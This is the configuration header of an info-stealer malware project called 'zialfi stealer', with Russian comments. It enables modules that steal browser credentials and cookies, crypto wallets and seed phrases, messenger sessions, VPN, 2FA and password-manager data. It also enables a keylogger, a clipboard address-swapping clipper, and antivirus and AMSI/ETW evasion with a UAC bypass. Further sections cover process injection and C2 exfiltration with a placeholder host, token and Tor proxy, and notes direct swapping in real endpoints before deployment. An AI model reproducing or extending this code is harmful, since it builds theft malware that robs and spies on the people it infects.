/*
 * config.h — Feature flags for zialfi stealer
 *
 * Откомментируй флаг чтобы отключить модуль.
 * Меньше модулей = меньше бинарник = меньше surface detection.
 */

#ifndef CONFIG_H
#define CONFIG_H


/* ─── Custom runtime ───────────────────────────────── */
#include <stddef.h>
char *mi_strdup(const char *s);

/* AUTO-GENERATED by make_polymorphic.py — run 'mingw32-make polymorph' to refresh */

/* ═══════ Crypto Constants ═══════════════════════════════════════ */

#define MIRAGE_SEED            0xAD75E594
#define MIRAGE_SSN_XOR_KEY     0xA3B5C7D9

static const unsigned char MIRAGE_STRING_KEY_ENC[16] = {
    0xb7, 0xfd, 0x48, 0xe9, 0x11, 0x15, 0x51, 0x12, 0x72, 0xaf, 0x9b, 0xf5, 0xd9, 0x25, 0x63, 0xe1
};
/* ═══════ Anti-Analysis Thresholds ═══════════════════════════════ */

#define VM_MIN_RAM               (4ULL * 1024 * 1024 * 1024)  /* 4 GB */
#define VM_MIN_CPU_CORES         2
#define VM_MIN_SCREEN_WIDTH      800
#define VM_MIN_SCREEN_HEIGHT     600
#define VM_TIMING_ANOMALY_TSC    0x1000
#define EVASION_SCORE_THRESHOLD  90    /* Если score >= 90, процесс завершается */

/* ═══════ Browser Stealer ════════════════════════════════════════ */

#define ENABLE_CHROMIUM_STEALER     /* 58 Chromium: Chrome, Edge, Brave, Opera, ... */
#define ENABLE_FIREFOX_STEALER      /* 10 Gecko: Firefox, Waterfox, Pale Moon, ... */
#define ENABLE_KILL_BROWSERS        /* Kill browser processes before file access */
#define ENABLE_ELEVATOR_IMPERSONATION /* winlogon.exe token impersonation for App-Bound */
#define ENABLE_CDP_GRABBER          /* Chrome DevTools Protocol cookie extraction */
#define ENABLE_RAW_EXPORT           /* Export raw browser DB files + master key */

/* ═══════ Wallets ═══════════════════════════════════════════════ */

#define ENABLE_WALLET_EXTENSIONS    /* 96 extension кошельков (MetaMask, Coinbase, ...) */
#define ENABLE_WALLET_DESKTOP       /* 38 desktop кошельков (Exodus, Electrum, ...) */

/* ═══════ Messengers ═════════════════════════════════════════════ */

#define ENABLE_DISCORD              /* Discord: tokens, billing, settings */
#define ENABLE_TELEGRAM             /* Telegram: sessions, databases */
#define ENABLE_SIGNAL               /* Signal: config, databases */
#define ENABLE_SKYPE                /* Skype: profile, messages */
#define ENABLE_VIBER                /* Viber: databases, media */
#define ENABLE_WHATSAPP             /* WhatsApp: databases, media */
#define ENABLE_ICQ                  /* ICQ: messages, config */
#define ENABLE_PIDGIN               /* Pidgin: .purple profile */
#define ENABLE_SESSION              /* Session: databases */
#define ENABLE_TOX                  /* Tox: profiles */
#define ENABLE_ELEMENT              /* Element (Matrix): databases */
#define ENABLE_JABBER               /* Jabber/XMPP: Psi, Gajim */
#define ENABLE_OUTLOOK              /* Outlook: PST, config */
#define ENABLE_MICROSIP             /* MicroSIP: config */

/* ═══════ System ═════════════════════════════════════════════════ */

#define ENABLE_SYSTEM_INFO          /* OS, CPU, RAM, IP, network */
#define ENABLE_WIFI_PASSWORDS       /* WiFi profiles + пароли */
#define ENABLE_KEYLOGGER            /* WH_KEYBOARD_LL hook (требует GUI) */
#define ENABLE_SCREENSHOT           /* GDI BitBlt → BMP */
#define ENABLE_CLIPBOARD            /* CF_UNICODETEXT → UTF-8 */
#define ENABLE_FILE_GRABBER         /* Desktop/Documents/Downloads, 10MB limit */
#define ENABLE_SEED_PHRASE_GRABBER  /* BIP39 wordlist scan (2048 слов) */
#define ENABLE_CLIPPER              /* BTC/ETH/LTC address swap в clipboard */

/* ═══════ Gaming ═════════════════════════════════════════════════ */

#define ENABLE_GAMING_STEAM         /* Steam: config.vdf, userdata, CS2 */
#define ENABLE_GAMING_MINECRAFT     /* Minecraft: saves, versions, 18 лончеров */
#define ENABLE_GAMING_ROBLOX        /* Roblox: AppData data */

/* ═══════ VPN ═══════════════════════════════════════════════════ */

#define ENABLE_VPN_NORDVPN
#define ENABLE_VPN_WIREGUARD
#define ENABLE_VPN_OPENVPN
#define ENABLE_VPN_SURFSHARK
#define ENABLE_VPN_EXPRESSVPN
#define ENABLE_VPN_CYBERGHOST
#define ENABLE_VPN_PIA              /* Private Internet Access */
#define ENABLE_VPN_MULLVAD
#define ENABLE_VPN_WINDSCRIBE
#define ENABLE_VPN_TUNNELBEAR
#define ENABLE_VPN_HOTSPOT_SHIELD
#define ENABLE_VPN_VYPRVPN
#define ENABLE_VPN_HAMACHI
#define ENABLE_VPN_HIDEMYNAME
#define ENABLE_VPN_IPVANISH
#define ENABLE_VPN_RADMINVPN
#define ENABLE_VPN_SOFTETHER
#define ENABLE_VPN_PROTONVPN

/* ═══════ 2FA Authenticators ════════════════════════════════════ */

#define ENABLE_2FA_GOOGLE           /* Google Authenticator */
#define ENABLE_2FA_MICROSOFT        /* Microsoft Authenticator */
#define ENABLE_2FA_AUTHY            /* Authy (Traktor) */
#define ENABLE_2FA_DUO              /* Duo Mobile */
#define ENABLE_2FA_OTP              /* OTP Auth */
#define ENABLE_2FA_FREEOTP          /* FreeOTP */
#define ENABLE_2FA_AEGIS            /* Aegis Authenticator */

/* ═══════ Password Managers ═════════════════════════════════════ */

#define ENABLE_PM_BITWARDEN
#define ENABLE_PM_1PASSWORD
#define ENABLE_PM_LASTPASS
#define ENABLE_PM_NORDPASS
#define ENABLE_PM_DASHLANE
#define ENABLE_PM_ROBOFORM
#define ENABLE_PM_KEEPASSXC
#define ENABLE_PM_Keeper

/* ═══════ Evasion ═══════════════════════════════════════════════ */

#define ENABLE_AMSI_BYPASS          /* Patch amsi.dll */
#define ENABLE_ETW_BYPASS           /* Patch ntdll!EtwEventWrite */
#define ENABLE_UAC_BYPASS           /* Fodhelper auto-elevation */
#define ENABLE_PEB_HIDE             /* Corrupt DOS header to hide from scanners */
#define ENABLE_DEFENDER_DISABLE     /* Registry-based disable */
#define ENABLE_ANTI_ANALYSIS        /* 15 weighted checks */
#define ENABLE_DETECTION            /* VM/debugger/process detection */
#define ENABLE_STACK_SPOOF          /* SilentMoonwalk call stack obfuscation */

#define ENABLE_MUTEX                /* Single-instance event */
#define ENABLE_SLEEP_OBFUSCATION    /* Ekko-style .text encryption during Sleep() */

#define ENABLE_UNHOOK_NTDLL         /* Restore ntdll.dll .text from clean copy */

/* ═══════ Cleanup ═══════════════════════════════════════════════ */

/* L2: 127.0.0.1:9050 is the default Tor SOCKS5 endpoint — change to real proxy before deploy */
/* Build-time placeholder — overridden by make_polymorphic.py */
 #define SOCKS5_HOST     "127.0.0.1"
 #define SOCKS5_PORT     9050
/* ═══════ SOCKS5 Proxy ════════════════════════════════════════ */
#define ENABLE_SOCKS5
/* L2: 127.0.0.1:9050 is the default Tor SOCKS5 endpoint — change to real proxy before deploy */
#define SOCKS5_HOST     "127.0.0.1"
#define SOCKS5_PORT     9050

/* ═══════ Process Injection ════════════════════════════════════ */

#define ENABLE_PROCESS_INJECTION
/*
 * TODO: randomize INJECT_TARGET per-build via make_polymorphic.py
 * Current: "notepad.exe" — choose from explorer.exe, svchost.exe, etc.
 */
#define INJECT_TARGET    "notepad.exe"

/* ═══════ CDP / Browser Debug Ports ══════════════════════════════ */

#define CDP_PORT_START     9222    /* Chrome DevTools Protocol range */
#define CDP_PORT_END       9230

/* ═══════ C2 Configuration ═══════════════════════════════════════ */

#define ENABLE_C2_EXFIL             /* Upload loot to C2 panel */
#define ENABLE_COMPRESSION          /* LZ4 compression for exfil payloads */
/* Build-time placeholder — overridden by make_polymorphic.py */
#define C2_HOST                "127.0.0.1"
#define C2_PORT                9999
#define C2_TOKEN               "e5a9e154ab67421cf2227dc8912ef32c"

/* ═══════ Certificate Pinning ═══════════════════════════════════ */
/* L1: CERT_PIN_HASH is all-zero — pinning is a no-op until a real SPKI hash is set at build time.
 * Set via: openssl s_client -connect HOST:443 | openssl x509 -pubkey \
 *   | openssl pkey -pubout -outform DER | sha256sum
 * Placeholder until build-time extraction is wired. */
#define CERT_PIN_HASH \
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
#ifndef NDEBUG
 #warning "C2_TOKEN auto-generated by make_polymorphic.py"
#endif

/* #define ZIALFI_DEBUG */  /* Uncomment to enable debug output */

#ifdef ZIALFI_DEBUG
    #define dbg_printf(...) printf(__VA_ARGS__)
#else
    #define dbg_printf(...) ((void)0)
#endif

/* ═══════ Runtime Config Overrides ═══════════════════════════ */
extern int g_cfg_loaded;

struct runtime_config {
    struct { int enabled; char type[32]; char source_id[128]; } proxy_gate;
    char c2_host[256];
    int  c2_port;
};
extern struct runtime_config g_config;

/* ═══════ Proxy Gate ═══════════════════════════════════════════ */
#define ENABLE_PROXY_GATE

/* ═══════ Test Mode — skip blocking checks for smoke testing ═══ */
/* #define ZIALFI_TEST_MODE */

#endif /* CONFIG_H */
